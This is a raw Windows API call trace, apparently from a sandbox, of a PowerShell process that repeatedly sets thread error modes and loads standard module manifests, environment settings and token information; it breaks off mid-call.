1 [0198.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.908] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.909] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.910] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.910] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.913] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.913] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.915] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.916] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.916] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.918] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.919] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.939] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.939] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.939] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df20) returned 1 [0198.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de50) returned 1 [0198.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de10) returned 1 [0198.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df30) returned 1 [0198.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508def0) returned 1 [0198.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508df80) returned 1 [0198.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508deb0) returned 1 [0198.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508de70) returned 1 [0198.961] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0198.970] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0198.975] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0199.084] CoTaskMemAlloc (cb=0x20e) returned 0x2386d706fc0 [0199.084] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x2386d706fc0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0199.084] CoTaskMemFree (pv=0x2386d706fc0) [0199.164] CoTaskMemAlloc (cb=0x20e) returned 0x2386d705a80 [0199.164] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x2386d705a80, nSize=0x105 | out: lpBuffer="") returned 0x0 [0199.164] CoTaskMemFree (pv=0x2386d705a80) [0199.176] CoTaskMemAlloc (cb=0x20c) returned 0x2386d705640 [0199.176] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2386d705640 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0199.177] CoTaskMemFree (pv=0x2386d705640) [0199.177] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xafa508dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0199.177] GetCurrentProcess () returned 0xffffffffffffffff [0199.177] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508e0b8 | out: TokenHandle=0xafa508e0b8*=0x710) returned 1 [0199.177] GetTokenInformation (in: TokenHandle=0x710, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xafa508e1b8 | out: TokenInformation=0x0, ReturnLength=0xafa508e1b8) returned 0 [0199.177] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2386d6fcbf0 [0199.177] GetTokenInformation (in: TokenHandle=0x710, TokenInformationClass=0x1, TokenInformation=0x2386d6fcbf0, TokenInformationLength=0x2c, ReturnLength=0xafa508e1b8 | out: TokenInformation=0x2386d6fcbf0, ReturnLength=0xafa508e1b8) returned 1 [0199.178] LocalFree (hMem=0x2386d6fcbf0) returned 0x0 [0199.179] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x2380084b2e8, cbSid=0xafa508e1b0 | out: pSid=0x2380084b2e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xafa508e1b0) returned 1 [0199.179] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xafa508e050*=0x718, lpdwindex=0xafa508de24 | out: lpdwindex=0xafa508de24) returned 0x0 [0199.180] CoTaskMemAlloc (cb=0x20e) returned 0x2386d706fc0 [0199.180] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x2386d706fc0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0199.180] CoTaskMemFree (pv=0x2386d706fc0) [0199.180] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0xafa508dd10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0199.188] CoTaskMemAlloc (cb=0x20e) returned 0x2386d701ac0 [0199.188] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x2386d701ac0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0199.188] CoTaskMemFree (pv=0x2386d701ac0) [0199.188] CoTaskMemAlloc (cb=0x20c) returned 0x2386d703cc0 [0199.188] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2386d703cc0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0199.188] CoTaskMemFree (pv=0x2386d703cc0) [0199.188] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xafa508dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0199.188] GetCurrentProcess () returned 0xffffffffffffffff [0199.188] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508e0b8 | out: TokenHandle=0xafa508e0b8*=0x720) returned 1 [0199.188] GetTokenInformation (in: TokenHandle=0x720, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xafa508e1b8 | out: TokenInformation=0x0, ReturnLength=0xafa508e1b8) returned 0 [0199.188] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2386d6fc0f0 [0199.188] GetTokenInformation (in: TokenHandle=0x720, TokenInformationClass=0x1, TokenInformation=0x2386d6fc0f0, TokenInformationLength=0x2c, ReturnLength=0xafa508e1b8 | out: TokenInformation=0x2386d6fc0f0, ReturnLength=0xafa508e1b8) returned 1 [0199.189] LocalFree (hMem=0x2386d6fc0f0) returned 0x0 [0199.189] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x23800851db0, cbSid=0xafa508e1b0 | out: pSid=0x23800851db0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xafa508e1b0) returned 1 [0199.189] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xafa508e050*=0x80c, lpdwindex=0xafa508de24 | out: lpdwindex=0xafa508de24) returned 0x0 [0199.190] CoTaskMemAlloc (cb=0x20e) returned 0x2386d701ce0 [0199.190] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x2386d701ce0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0199.190] CoTaskMemFree (pv=0x2386d701ce0) [0199.190] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0xafa508dd10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0199.192] CoTaskMemAlloc (cb=0x20e) returned 0x2386d703cc0 [0199.192] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x2386d703cc0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0199.192] CoTaskMemFree (pv=0x2386d703cc0) [0199.192] CoTaskMemAlloc (cb=0x20c) returned 0x2386d704320 [0199.192] SHGetFolderPathW (in: hwnd=0x0, 